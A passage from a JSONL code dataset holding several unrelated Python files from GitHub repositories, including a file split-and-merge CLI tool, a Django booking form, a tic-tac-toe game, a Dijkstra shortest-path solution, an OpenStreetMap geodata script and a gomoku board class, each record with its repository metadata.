Objects\nprint(\"trabajando en cajas\")\nr.scene.append( AABB((0.01, -1.59, -6.04), [6, 0.2, 6] , boxMat ) )\nr.scene.append( AABB((3.38, 1.01, -6.12), [0.1, 6.86, 6.86] , wall ) )\nr.scene.append( AABB((-3.38, 1.01, -6.12), [0.1, 6.86, 6.86] , wall ) )\nr.scene.append( AABB((0.35, 0.01, -6.00), [0.3, 0.3, 0.3], stone))\nr.scene.append( AABB((-0.35, 0.01, -6.00), [0.3, 0.3, 0.3], brick))\nr.scene.append( AABB([0.01, 3.6, -5.98], [6.86, 0.2, 6.86] , mirror ) )\n\n\n\nr.rtRender()\n\nr.glFinish('output.bmp')\n\n\n\n\n\n","repo_name":"Mcoconan/proyecto2G","sub_path":"RayTracer.py","file_name":"RayTracer.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3184698343","text":"import os, sys, re\nimport logging\nimport argparse\nimport time\n\n\nclass SplitAndCombineFiles:\n \"\"\" This is a simple class to split and merge the files\n\n 1. Split the binary files to the smaller chunks\n 2. merge the binary files into the single file\n usage :\n usage: file_split_merge [-h] [-i INPUT] [-s] [-n CHUNK] [-m]\n\n optional arguments:\n -h, --help show this help message and exit\n -i INPUT, --input INPUT\n Provide the File that needs to be Split\n -s, --split To Split the File\n -n CHUNK, --chunk CHUNK\n No. of Chunks to be created\n -m, --merge Merge the Files\n\n examples :\n file_split_merge -s -i first_project.zip -n 5\n file_split_merge -s -i first_project.zip -n 5kb\n file_split_merge -s -i first_project.zip -n 2gb\n file_split_merge -s -i \"c:\\temp\\first_project.zip\" -n 5\n file_split_merge -m -i first_project.zip\n file_split_merge -m -i \"c:\\temp\\\\first_project.zip\"\n \"\"\"\n def __init__(self):\n self.__input_file_name = None\n self.__chunk = None\n self.__postfix = '.ros'\n self.f_size = 0\n self.check_list = \"\"\n self.data_read_chunk = 5\n\n def get_file_chunks_from_count(self):\n \"\"\" This method is to get the file chunk sizes\"\"\"\n # get the file zize\n self.f_size = os.path.getsize(self.__input_file_name)\n log(\"Total file Size : {}\".format(str(self.f_size)))\n\n # get the file chunks\n f_chunk = int(float(self.f_size) / float(self.__chunk))\n log(\"Splitting into {} files of {} size\".format(str(self.__chunk),\n str(f_chunk)))\n return int(f_chunk), int(self.__chunk)\n\n def get_file_count_from_size(self):\n \"\"\" This method is to get the file chunk sizes\"\"\"\n\n size = {\"b\": 1, \"kb\": 1024, \"mb\": 1024 ** 2, \"gb\": 1024 ** 3}\n\n # get the file zize\n self.f_size = os.path.getsize(self.__input_file_name)\n log(\"Total file Size : {}\".format(str(self.f_size)))\n\n # get the file chunks\n f_chunk = re.sub(\"\\D\", \"\", self.__chunk)\n size_type = self.__chunk.replace(f_chunk, \"\")\n f_chunk = int(f_chunk) * size[size_type]\n no_of_files = self.f_size / f_chunk\n if no_of_files > 1:\n no_of_files = int(no_of_files) + 1 if \\\n no_of_files%int(no_of_files) > 0 \\\n else int(no_of_files)\n else:\n no_of_files = 1\n\n log(\"Splitting into {} files of {} size\".format(str(no_of_files),\n str(self.__chunk)))\n\n return int(f_chunk), int(no_of_files)\n\n @staticmethod\n def read_file_in_chunks(file_obj, read_until=-1, chunk_size=5):\n \"\"\"\n Lazy function to read a file piece by piece.\n Default chunk size: 5mb.\n :param file_obj : The file open object which has to be read\n :param read_until : How much of total chunk has to be read from\n the file.\n Default = -1 i.e read full file\n :param chunk_size : How much of chunk has to be read in one iter\n Default chunk size: 5mb.\n :return Data Generator\n \"\"\"\n\n tot_read = 0\n total_iter = 0\n total_count = 0\n last_chunk = False\n chunk_size = chunk_size * 1024 * 8 # convert to mb\n # If chunk_size is greater than the read_until, then\n # default the chunk_size to read_until\n if not read_until == -1 and \\\n (read_until < chunk_size):\n chunk_size = read_until\n\n # if not reading full file , count total iteration required to\n # accumulate the read_until size.\n if not read_until == -1:\n total_iter = int(read_until/chunk_size)\n\n while True:\n # If not reading full file, then calculate the remaining chunks\n # in the last iteration\n if (total_count == total_iter - 1) and not read_until == -1:\n chunk_size = read_until - tot_read\n last_chunk = True\n\n data = file_obj.read(chunk_size)\n tot_read += len(data)\n total_count += 1\n\n # if data is present , then yiled , else break\n if data:\n yield data\n else:\n break\n\n # If this is a last chunk, then break\n if last_chunk:\n # print(total_count, total_iter, chunkSize)\n break\n\n def __split(self, input_file_name, chunk_size):\n \"\"\" Split the files\n :param input_file_name : The filename which has to be split\n :param chunk_size : Actual number of files to be split\n :return None\n \"\"\"\n self.__input_file_name = input_file_name\n self.__chunk = chunk_size\n\n log(\"Splitting the File Now\")\n\n if self.__chunk.isdigit():\n f_chunk, chunk_size = self.get_file_chunks_from_count()\n else:\n f_chunk, chunk_size = self.get_file_count_from_size()\n\n # read the content of the main file\n read_main_file = open(self.__input_file_name, \"rb\")\n tot_bytes_in_file = 0\n\n # Iterate through chunk size\n for i in range(int(chunk_size)):\n log(\" - Splitting {}/{} files\".format(str(i+1),\n str(int(chunk_size))))\n\n _chunk_file_name = \"{}-{}{}\".format(str(self.__input_file_name),\n str(i+1),\n str(self.__postfix))\n\n # Last chunk , include the remaining data\n if i == chunk_size - 1:\n f_chunk = self.f_size - tot_bytes_in_file\n\n # Read the chunks from the file\n # data = read_main_file.read(f_chunk)\n data = self.read_file_in_chunks(read_main_file, read_until=f_chunk,\n chunk_size = self.data_read_chunk)\n\n # collect the first chunk and last chunk of every file\n # This content is used for verification while merging\n first_check = None\n last_check = None\n with open(_chunk_file_name, \"wb\") as _:\n for chunks in data:\n if not first_check:\n first_check = chunks[5]\n last_check = chunks[-5]\n _.write(chunks)\n\n tot_bytes_in_file += f_chunk\n\n # crc content\n self.check_list += str(first_check) + \"-\" + str(last_check)\n\n _crc_file_name = \"{}-{}{}\".format(str(self.__input_file_name),\n \"CRC\", str(self.__postfix))\n\n # log(\"Creating the check file : {}\".format(str(_crc_file_name)))\n with open(_crc_file_name, \"w\") as crc_file:\n crc_file.write(self.check_list)\n\n log(\"File split successfully\")\n\n def __merge(self, input_file_name):\n \"\"\" Merge the Files\n :param input_file_name : filename in .zip format ex : filename.zip\n :return none\"\"\"\n log(\"Merging the file to {}\".format(str(input_file_name)))\n\n _root_dir, _file_name = os.path.split(\n os.path.realpath(input_file_name))\n\n _file_path = os.path.join(_root_dir, _file_name)\n\n if os.path.exists(_file_path):\n log(\"File Already Exist. Please remove the {} and \"\n \"then re-run.\".format(str(_file_path)))\n\n # Prompt if file need to be deleted automatically\n prompt = input(\"\\nDo you want to remove the file [Y/N] : \")\n if prompt.strip().lower() == \"y\":\n os.remove(_file_path)\n else:\n return\n\n # get all the split files available\n file_list = self.get_split_files(_root_dir, _file_name)\n if not file_list:\n log(\"No Split files found\")\n return\n\n # get the crc file\n _crc_file_name = \"{}-{}{}\".format(str(_file_name),\n \"CRC\", str(self.__postfix))\n _crc_file_path = os.path.join(_root_dir,_crc_file_name)\n if not os.path.exists(_crc_file_path):\n log(\"{} file is missing\".format(str(_crc_file_path)))\n return\n\n _crc_data = open(_crc_file_path, \"r\").read()\n\n # Merge the files\n # Sort the file names\n log(\"Found {} file(s) for merging\".format(len(file_list)))\n for files in sorted(file_list):\n f_name = file_list[files]\n log(\" - Merging {} file\".format(f_name))\n # collect the first chunk and last chunk of every file\n # This content is used for verification while merging\n first_check = None\n last_check = None\n with open(input_file_name, 'ab') as new_file:\n read_main_file = open(os.path.join(_root_dir,\n f_name), 'rb')\n data = self.read_file_in_chunks(read_main_file,\n read_until=-1,\n chunk_size=\n self.data_read_chunk)\n for chunks in data:\n if not first_check:\n first_check = chunks[5]\n last_check = chunks[-5]\n new_file.write(chunks)\n\n # create the content for the file copy check\n self.check_list += str(first_check) + \"-\" + str(last_check)\n\n # check the crc data\n log(\"Checking if the files are merged properly\")\n if _crc_data == self.check_list:\n log(\"File check : Passed\")\n else:\n log(\"File check : Failed.\")\n return\n\n log(\"File Merged successfully\")\n\n def get_split_files(self, root_dir, file_name):\n \"\"\" Find out all the zip files in the folder\n :param root_dir : Directory path where files are present\n :param file_name : filename in .zip format ex : filename.zip\n :return list of the files\n \"\"\"\n # Find all the files matching the format\n file_list = {}\n\n file_format = re.compile(file_name + '-' + '[0-9]+'+self.__postfix)\n for f in os.listdir(root_dir):\n if file_format.match(f):\n _ = f.split('-')[-1]\n _ = int(re.sub('\\D', '', _))\n file_list[_] = f\n\n return file_list\n\n def split(self, input_file_name, chunk_size):\n self.__split(input_file_name, chunk_size)\n\n def merge(self, input_file_name):\n self.__merge(input_file_name)\n\n\ndef error_args(error_msg):\n \"\"\" this is just a error message for args\"\"\"\n log(\"\\n\")\n log(\"Error : Arguments provided is invalid\")\n log(error_msg)\n log(\"use -h for more details\")\n exit(usage())\n\n\ndef log(value):\n \"\"\" This is just a print method\"\"\"\n print(value)\n\n\ndef usage():\n return r\"\"\"\\n\n --------------------------------------------------------------\n Usage: file_split_merge [-h] [-i INPUT] [-s] [-n CHUNK] [-m]\\n\n optional arguments:\n -h, --help show this help message and exit\n -i INPUT, --input INPUT\n Provide the File that needs to be Split\n -s, --split To Split the File\n -n CHUNK, --chunk CHUNK\n [n]: No. of files to be created\n [n]kb : Split the file in nKB size\n [n]b : Split the file in nb size\n [n]mb : Split the file in nmb size\n [n]gb : Split the file in ngb size\n\n -m, --merge Merge the Files\n\n\n examples :\n file_split_merge -s -i first_project.zip -n 5\n file_split_merge -s -i first_project.zip -n 5kb\n file_split_merge -s -i first_project.zip -n 2gb\n file_split_merge -s -i \"c:\\temp\\first_project.zip\" -n 5\n file_split_merge -m -i first_project.zip\n file_split_merge -m -i \"c:\\temp\\\\first_project.zip\"\n ----------------------------------------------------------------\n \"\"\"\n\n\ndef main():\n start_time = time.time()\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input',\n help=\"Provide the File that needs to be Split\")\n parser.add_argument('-s', '--split', action=\"store_true\",\n help=\"To Split the File\")\n parser.add_argument('-n', '--chunk',\n help=\"No. of Chunks to be created\")\n parser.add_argument('-m', '--merge', action=\"store_true\",\n help=\"Merge the Files\")\n parser.add_argument('-r', '--read', default=5,type=int,\n help=\"The speed at which data has to be read. \"\n \"Higher the value , faster the process, \"\n \"but possible memory leak\")\n\n args = parser.parse_args()\n\n # Perform Split Operation\n\n if not (args.split or args.merge):\n error_args(\"-s or -m has to be Specified\")\n\n if args.split:\n log(\"\\n------------- STARTING FILE SPLIT -------------\\n\")\n if not(args.input and args.chunk):\n error_args(\"Split command requires -i and -n\")\n else:\n sm = SplitAndCombineFiles()\n sm.data_read_chunk = args.read\n sm.split(args.input, args.chunk)\n\n\n # Perform Merge Operation\n if args.merge:\n log(\"\\n------------- STARTING FILE MERGE -------------\\n\")\n if not args.input:\n error_args(\"Merge command requires -i\")\n else:\n sm = SplitAndCombineFiles()\n sm.data_read_chunk = args.read\n sm.merge(args.input)\n\n log(\"Complete in {} seconds\".format(str(int(time.time() - start_time))))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"roshanok/file_split_merge","sub_path":"file_split_merge/file_split_merge.py","file_name":"file_split_merge.py","file_ext":"py","file_size_in_byte":13977,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"72996380406","text":"from django import forms\nfrom . models import Booking\n\n\nclass BookingForm(forms.ModelForm):\n\n\n class Meta:\n model = Booking\n fields = [\n 'user_name',\n 'name',\n 'children',\n 'adult',\n 'check_in',\n 'check_out',\n 'email',\n 'request_guiid',\n ]\n widgets = {\n # 'check_out': forms.DateField(format(\"%b %d %Y\")),\n 'check_in': forms.DateInput(format=('%m/%d/%Y'), attrs={'class':'form-control', 'placeholder':'Select a date', 'type':'date'}),\n 'check_out': forms.DateInput(format=('%m/%d/%Y'), attrs={'class':'form-control', 'placeholder':'Select a date', 'type':'date'}),\n \n }\n \n \n\n\n \n ","repo_name":"Emmanuel-Aggrey/toursite","sub_path":"ticket/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38616248610","text":"from random import randrange\r\n\r\n\r\ndef display_board(board):\r\n\tprint(\"+-------\" * 3,\"+\", sep=\"\")\r\n\tfor row in range(3):\r\n\t\tprint(\"| \" * 3,\"|\", sep=\"\")\r\n\t\tfor col in range(3):\r\n\t\t\tprint(\"| \" + str(board[row][col]) + \" \", end=\"\")\r\n\t\tprint(\"|\")\r\n\t\tprint(\"| \" * 3,\"|\",sep=\"\")\r\n\t\tprint(\"+-------\" * 3,\"+\",sep=\"\")\r\n\r\n\r\ndef enter_move(board):\r\n\tok = False\r\n\twhile not ok:\r\n\t\tmove = input(\"Ingresa tu movimiento: \") \r\n\t\tok = len(move) == 1 and move >= '1' and move <= '9'\r\n\t\tif not ok:\r\n\t\t\tprint(\"Movimiento erróneo, ingrésalo nuevamente\")\r\n\t\t\tcontinue\r\n\t\tmove = int(move) - 1\r\n\t\trow = move // 3\r\n\t\tcol = move % 3\r\n\t\tsign = board[row][col]\r\n\t\tok = sign not in ['O','X'] \r\n\t\tif not ok:\r\n\t\t\tprint(\"¡Cuadro ocupado, ingresa nuevamente!\")\r\n\t\t\tcontinue\r\n\tboard[row][col] = 'O'\r\n\r\n\r\ndef make_list_of_free_fields(board):\r\n\tfree = []\r\n\tfor row in range(3):\r\n\t\tfor col in range(3):\r\n\t\t\tif board[row][col] not in ['O','X']:\r\n\t\t\t\tfree.append((row,col))\r\n\treturn free\r\n\r\n\r\ndef victory_for(board,sgn):\r\n\tif sgn == \"X\":\r\n\t\twho = 'me'\r\n\telif sgn == \"O\":\r\n\t\twho = 'you'\r\n\telse:\r\n\t\twho = None\r\n\tcross1 = cross2 = True\r\n\tfor rc in range(3):\r\n\t\tif board[rc][0] == sgn and board[rc][1] == sgn and board[rc][2] == sgn:\r\n\t\t\treturn who\r\n\t\tif board[0][rc] == sgn and board[1][rc] == sgn and board[2][rc] == sgn:\r\n\t\t\treturn who\r\n\t\tif board[rc][rc] != sgn:\r\n\t\t\tcross1 = False\r\n\t\tif board[2 - rc][2 - rc] != sgn:\r\n\t\t\tcross2 = False\r\n\tif cross1 or cross2:\r\n\t\treturn who\r\n\treturn None\r\n\r\n\r\ndef draw_move(board):\r\n\tfree = make_list_of_free_fields(board)\r\n\tcnt = len(free)\r\n\tif cnt > 0:\r\n\t\tthis = randrange(cnt)\r\n\t\trow, col = free[this]\r\n\t\tboard[row][col] = 'X'\r\n\r\n\r\nboard = [ [3 * j + i + 1 for i in range(3)] for j in range(3) ] \r\nboard[1][1] = 'X'\r\nfree = make_list_of_free_fields(board)\r\nhuman_turn = True\r\nwhile len(free):\r\n\tdisplay_board(board)\r\n\tif human_turn:\r\n\t\tenter_move(board)\r\n\t\tvictor = victory_for(board,'O')\r\n\telse:\t\r\n\t\tdraw_move(board)\r\n\t\tvictor = victory_for(board,'X')\r\n\tif victor != None:\r\n\t\tbreak\r\n\thuman_turn = not human_turn\t\t\r\n\tfree = make_list_of_free_fields(board)\r\n\r\ndisplay_board(board)\r\nif victor == 'you':\r\n\tprint(\"¡Has ganado!\")\r\nelif victor == 'me':\r\n\tprint(\"¡He ganado!\")\r\nelse:\r\n\tprint(\"¡Empate!\")\r\n","repo_name":"Zamora-000419/Tic-tac-toe-Python","sub_path":"Tic-Tac-Toe.py","file_name":"Tic-Tac-Toe.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9861084660","text":"'''\ngoal : 현서가 찬홍이에게 가는 길에 만나는 소의 여물을 주는 최소 비용 구하기\n 1) N,M의 범위가 크다 -> 플루이드 워셜 X\n 2) 최단 경로(비용) 구하기\n0. 라이브러리 추가 _ sys(입력), heapq\n1. 입력 받기\n 1) N,M : 노드와 간선의 수\n 2) FROM, TO, COST : 시작 / 도착 / 비용\n2. 로직\n 1) 변수 : graph(인접노드 추가), distance(방문여부 체크 _ INF 로 초기화)\n 2) 다익스트라 알고리즘 : HEAPQ를 활용\n3. 결과출력\n'''\n\n# 0\nimport sys\nimport heapq\n\ninput = sys.stdin.readline\nINF = float('inf')\n\n\ndef shortestPath(s):\n q = [(0, s)]\n distance[s] = 0\n\n while q:\n cost, node = heapq.heappop(q)\n\n if distance[node] < cost:\n continue\n\n for i in graph[node]:\n cc = cost + i[1]\n if cc < distance[i[0]]:\n distance[i[0]] = cc\n heapq.heappush(q, (cc, i[0]))\n\n\n# 1\nN, M = map(int, input().split())\ngraph = [[] * (N+1) for _ in range(N+1)]\ndistance = [INF] * (N+1)\n\nfor _ in range(M):\n fr, to, cost = map(int, input().split())\n graph[fr].append((to, cost))\n graph[to].append((fr, cost))\n\n# 2\nshortestPath(1)\n\n# 3\nprint(distance[N])\n","repo_name":"plerin/solveThePS","sub_path":"Daily/211011/택배배송_최단경로_5972.py","file_name":"택배배송_최단경로_5972.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9400892842","text":"#!/usr/bin/env python\n# coding: utf-8 \n# Gao Ming Ming Create At 2020-12-17 17:29:54\n# Description:some description\n\nimport pulsar\n\nclient = pulsar.Client('pulsar://localhost:6650')\n\ntopic = 'big_apple'\n#print(client.get_topic_partitions(topic))\nconsumer = client.subscribe(topic,subscription_name='my-sub')\n\nprint(consumer)\n\nwhile True:\n msg = consumer.receive()\n print(msg.data())\n consumer.acknowledge(msg)\n\nclient.close()\n\n","repo_name":"NothinkingGao/pulsar-admin","sub_path":"customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"26155743591","text":"\"\"\"\npython3\n\nRebuild OSM features from OSM urls\n\nOSM features are identified as either relations, ways, or nodes (OSM directions can also be parsed)\n\n\"\"\"\n\nimport sys\nimport os\nimport math\nimport shutil\nimport json\nimport configparser\nimport itertools\nfrom pathlib import Path\n\nfrom shapely.geometry import MultiPolygon\nfrom shapely.ops import unary_union\nimport pandas as pd\nimport geopandas as gpd\n\nimport utils\n\n\n# ensure correct working directory when running as a batch parallel job\n# in all other cases user should already be in project directory\nif not hasattr(sys, 'ps1'):\n os.chdir(os.path.dirname(__file__))\n\n# read config file\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\nbase_dir = Path(config[\"main\"][\"base_directory\"])\nrun_name = config[\"main\"][\"active_run_name\"]\ngithub_name, github_repo, github_branch = config[\"main\"][\"github_name\"], config[\"main\"][\"github_repo\"], config[\"main\"][\"github_branch\"]\n\nrelease_name = config[run_name][\"release_name\"]\n\n\nparallel = config.getboolean(run_name, \"parallel\")\nmax_workers = int(config[run_name][\"max_workers\"])\n\nsample_size = int(config[run_name][\"sample_size\"])\n\n# fields from input csv\nid_field = config[run_name][\"id_field\"]\nlocation_field = config[run_name][\"location_field\"]\n\n# search string used to identify relevant OSM link within the location_field of input csv\nosm_str = config[run_name][\"osm_str\"]\n\noutput_project_fields = json.loads(config[run_name][\"output_project_fields\"])\n\nprepare_only = config.getboolean(run_name, \"prepare_only\")\n\nfrom_existing = config.getboolean(run_name, \"from_existing\")\nif from_existing:\n from_existing_timestamp = config[run_name][\"from_existing_timestamp\"]\n\nupdate_mode = config.getboolean(run_name, \"update_mode\")\nif update_mode:\n update_ids = json.loads(config[run_name][\"update_ids\"])\n update_timestamp = config[run_name][\"update_timestamp\"]\n\n\ntimestamp = utils.get_current_timestamp('%Y_%m_%d_%H_%M')\n\n# directory where all outputs will be saved\noutput_dir = base_dir / \"output_data\" / release_name\nresults_dir = output_dir / \"results\" / timestamp\nos.makedirs(os.path.join(results_dir, \"geojsons\"), exist_ok=True)\n\napi = utils.init_overpass_api()\n\n\n# =====\nimport importlib\nimportlib.reload(utils)\n# =====\n\nif __name__ == \"__main__\":\n\n input_data = utils.load_input_data(base_dir, release_name)\n\n link_df_path = results_dir / \"osm_links.csv\"\n invalid_link_df_path = results_dir / \"osm_invalid_links.csv\"\n feature_prep_df_path = results_dir / \"feature_prep.csv\"\n\n if from_existing:\n existing_dir = base_dir / \"output_data\" / release_name / \"results\" / from_existing_timestamp\n existing_link_df_path = existing_dir / \"osm_valid_links.csv\"\n existing_invalid_link_df_path = existing_dir / \"osm_invalid_links.csv\"\n existing_feature_prep_df_path = existing_dir / \"feature_prep.csv\"\n\n full_feature_prep_df = pd.read_csv(existing_feature_prep_df_path)\n\n # copy previously generated files to directory for current run\n shutil.copyfile(existing_link_df_path, link_df_path)\n shutil.copyfile(existing_invalid_link_df_path, invalid_link_df_path)\n\n else:\n\n loc_df = input_data[[id_field, location_field]].copy(deep=True)\n loc_df.columns = [\"id\", \"location\"]\n\n if update_mode:\n loc_df = loc_df.loc[loc_df[\"id\"].isin(update_ids)]\n\n # keep rows where location field contains at least one osm link\n link_df = loc_df.loc[loc_df.location.notnull() & loc_df.location.str.contains(osm_str)].copy(deep=True)\n # get osm links from location field\n link_df[\"osm_list\"] = link_df.location.apply(lambda x: utils.split_and_match_text(x, \" \", osm_str))\n # save dataframe with osm links to csv\n link_df.to_csv(link_df_path, index=False, encoding=\"utf-8\")\n\n # save all rows invalid osm links to separate csv that can be referenced for fixes\n invalid_str_list = [\"search\", \"query\"]\n invalid_link_df = link_df.loc[link_df.osm_list.apply(lambda x: any(i in str(x) for i in invalid_str_list))].copy(deep=True)\n invalid_link_df.to_csv(invalid_link_df_path, index=False, encoding=\"utf-8\")\n\n # drop all rows with invalid osm links\n valid_link_df = link_df.loc[~link_df.index.isin(invalid_link_df.index)].copy(deep=True)\n\n print(f\"\"\"\n {len(loc_df)} projects provides\n {len(link_df)} contain OSM links\n {len(invalid_link_df)} contain at least 1 non-parseable link\n {len(valid_link_df)} projects with valid links\n \"\"\")\n\n full_feature_prep_df = utils.classify_osm_links(valid_link_df)\n\n\n\n # option to sample data for testing; sample size <=0 returns full dataset\n feature_prep_df = utils.sample_features(full_feature_prep_df, sample_size=2)\n\n print(feature_prep_df.osm_type.value_counts())\n\n # get svg path for osm \"directions\" links\n results = utils.generate_svg_paths(feature_prep_df, overwrite=False)\n\n # join svg paths back to dataframe\n for unique_id, svg_path in results:\n feature_prep_df.loc[unique_id, \"svg_path\"] = svg_path\n\n\n\n feature_prep_df.to_csv(feature_prep_df_path, index=False)\n\n if prepare_only:\n sys.exit(\"Completed preparing feature_prep_df.csv, and exiting as `prepare_only` option was set.\")\n\n\n\n # -------------------------------------\n # -------------------------------------\n\n def gen_flist(df):\n # generate list of tasks to iterate over\n flist = list(zip(\n df[\"unique_id\"],\n df[\"clean_link\"],\n df[\"osm_type\"],\n df[\"osm_id\"],\n df[\"svg_path\"],\n # itertools.repeat(driver),\n itertools.repeat(api)\n ))\n return flist\n\n flist = gen_flist(feature_prep_df)\n\n\n print(\"Running feature generation\")\n\n valid_df = None\n errors_df = None\n iteration = 0\n while errors_df is None or len(errors_df) > 0:\n\n iteration += 1\n\n if errors_df is not None:\n flist = gen_flist(errors_df)\n\n # get_osm_feat for each row in feature_prep_df\n # - parallelize\n # - buffer lines/points\n # - convert all features to multipolygons\n\n # results = []\n # for result in run_tasks(get_osm_feat, flist, parallel, max_workers=max_workers, chunksize=1, unordered=True):\n # results.append(result)\n iter_max_workers = math.ceil(max_workers / iteration)\n\n results = utils.run_tasks(utils.get_osm_feat, flist, parallel, max_workers=iter_max_workers, chunksize=1)\n\n # ---------\n # column name for join field in original df\n results_join_field_name = \"unique_id\"\n # position of join field in each tuple in task list\n results_join_field_loc = 0\n # ---------\n\n # join function results back to df\n results_df = pd.DataFrame(results, columns=[\"status\", \"message\", results_join_field_name, \"feature\"])\n # results_df.drop([\"feature\"], axis=1, inplace=True)\n results_df[results_join_field_name] = results_df[results_join_field_name].apply(lambda x: x[results_join_field_loc])\n\n output_df = feature_prep_df.merge(results_df, on=results_join_field_name, how=\"left\")\n\n\n if valid_df is None:\n valid_df = output_df[output_df[\"status\"] == 0].copy()\n else:\n valid_df = pd.concat([valid_df, output_df.loc[output_df.status == 0]])\n\n\n errors_df = output_df[output_df[\"status\"] > 0].copy()\n print(\"\\t{} errors found out of {} tasks\".format(len(errors_df), len(output_df)))\n\n if iter_max_workers == 1 or iteration >= 5 or len(set(errors_df.message)) == 1 and \"IndexError\" in list(set(errors_df.message))[0]:\n break\n\n\n errors_df.to_csv(os.path.join(results_dir, \"processing_errors_df.csv\"), index=False)\n\n # output valid results to csv\n valid_df[[i for i in valid_df.columns if i != \"feature\"]].to_csv(results_dir / \"valid_df.csv\", index=False)\n valid_df.to_csv(results_dir / \"valid_gdf.csv\", index=False)\n\n\n # -------------------------------------\n # -------------------------------------\n\n\n print(\"Building GeoJSONs\")\n\n # combine features for each project\n # - iterate over all polygons (p) within feature multipolygons (mp) to create single multipolygon per project\n\n grouped_df = valid_df.groupby(\"project_id\")[\"feature\"].apply(list).reset_index(name=\"feature_list\")\n # for group in grouped_df:\n # group_mp = MultiPolygon([p for mp in group.feature for p in mp]).__geo_interface_\n # move this to apply instead of loop so we can have a final df to output results/errors to\n grouped_df[\"multipolygon\"] = grouped_df.feature_list.apply(lambda mp_list: unary_union([p for mp in mp_list for p in mp.geoms]))\n grouped_df[\"multipolygon\"] = grouped_df.multipolygon.apply(lambda x: MultiPolygon([x]) if x.type == \"Polygon\" else x)\n grouped_df[\"feature_count\"] = grouped_df.feature_list.apply(lambda mp: len(mp))\n grouped_df[\"geojson_path\"] = grouped_df.project_id.apply(lambda x: os.path.join(results_dir, \"geojsons\", f\"{x}.geojson\"))\n\n\n # join original project fields back to be included in geojson properties\n project_data_df = input_data[output_project_fields].copy()\n grouped_df = grouped_df.merge(project_data_df, left_on=\"project_id\", right_on=id_field, how=\"left\")\n\n\n # -----\n # create individual geojsons\n for ix, row in grouped_df.iterrows():\n path, geom, props = utils.prepare_single_feature(row)\n utils.output_single_feature_geojson(geom, props, path)\n\n if update_mode:\n # copy geojsons from update_timestamp geojsons dir to current timestamp geojsons dir\n update_target_geojsons = base_dir / \"output_data\" / release_name / \"results\" / update_timestamp / \"geojsons\"\n for gj in update_target_geojsons.iterdir():\n if int(gj.name.split(\".\")[0]) not in grouped_df.project_id.values:\n shutil.copy(gj, results_dir / \"geojsons\")\n\n # -----\n # create combined GeoJSON for all data\n combined_gdf = pd.concat([gpd.read_file(gj) for gj in (results_dir / \"geojsons\").iterdir()])\n\n # add github geojson urls\n combined_gdf[\"viz_geojson_url\"] = combined_gdf.id.apply(lambda x: f\"https://github.com/{github_name}/{github_repo}/blob/{github_branch}/latest/geojsons/{x}.geojson\")\n combined_gdf[\"dl_geojson_url\"] = combined_gdf.id.apply(lambda x: f\"https://raw.githubusercontent.com/{github_name}/{github_repo}/{github_branch}/latest/geojsons/{x}.geojson\")\n\n # date fields can get loaded a datetime objects which can geopandas doesn't always like to output, so convert to string to be safe\n for c in combined_gdf.columns:\n if c.endswith(\"Date (MM/DD/YYYY)\"):\n combined_gdf[c] = combined_gdf[c].apply(lambda x: str(x))\n\n combined_gdf.to_file(results_dir / \"all_combined_global.geojson\", driver=\"GeoJSON\")\n\n # -----\n # create combined GeoJSON for each finance type\n for i in set(combined_gdf.finance_type):\n print(i)\n subgrouped_df = combined_gdf[combined_gdf.finance_type == i].copy()\n subgrouped_df.to_file(results_dir / f\"{i}_combined_global.geojson\", driver=\"GeoJSON\")\n\n\n # -----\n # create final csv\n drop_cols = ['project_id', 'feature_list', 'multipolygon', 'feature_count', 'geojson_path', 'geometry']\n combined_gdf[[i for i in combined_gdf.columns if i not in drop_cols]].to_csv(os.path.join(results_dir, \"final_df.csv\"), index=False)\n\n\n # -----\n # final summary output\n print(f\"\"\"\n Dataset complete: {timestamp}\n \\t{results_dir}\n To set this as latest dataset: \\n\\t bash {base_dir}/set_latest.sh {release_name} {timestamp}\n \"\"\")\n","repo_name":"aiddata/china-osm-geodata","sub_path":"tuff_osm.py","file_name":"tuff_osm.py","file_ext":"py","file_size_in_byte":11675,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"76"} +{"seq_id":"16195736070","text":"from typing import Set, List\nfrom typing_extensions import Literal\nfrom collections import defaultdict\n\nclass ChessBoard(object):\n '''\n Chess Board\n A gomoku board class.\n '''\n def __init__(self, size:int=15, win_len:int=5) -> None:\n '''\n Initialize a board.\n ## Parameters\\n\n size: int, optional\n Size of the gomoku board. Default is 15, which is the standard size.\n Don't passed a number greater than 15.\n win_len: int, optional\n Number of stones in a line needed to win a game. Default is 5.\n '''\n self.size = size\n self.win_len = win_len\n self.board = [[0 for _ in range(size)] for _ in range(size)]\n self.count = [[0 for _ in range(size)] for _ in range(size)]\n self.link3 = {c: set() for c in [1, -1]}\n self.link4 = {c: set() for c in [1, -1]}\n self.link5 = {c: set() for c in [1, -1]}\n self.par_link3 = {c: set() for c in [1, -1]}\n self.par_link4 = {c: set() for c in [1, -1]}\n self.cross = {c: set() for c in [1, -1]}\n self.par_cross = {c: set() for c in [1, -1]}\n self.dir = {c: {} for c in [1, -1]}\n self.par_dir = {c: defaultdict(dict) for c in [1, -1]}\n self.moves: List[tuple] = []\n self.now_playing: Literal[1, -1] = 1\n self.winner = 0\n \n def is_inside(self, move:tuple) -> bool:\n i, j = move\n is_inside = i >= 0 and i < self.size and j >= 0 and j < self.size\n return is_inside\n\n def is_legal(self, move:tuple) -> bool:\n '''\n Judge whether a stone can be placed at given coordinate.\n ## Parameters\\n\n move: tuple\n The coordinate of move about to be judged.\n '''\n is_inside = self.is_inside(move)\n if not is_inside:\n return False\n is_vacancy = self.board[move[0]][move[1]] == 0\n return 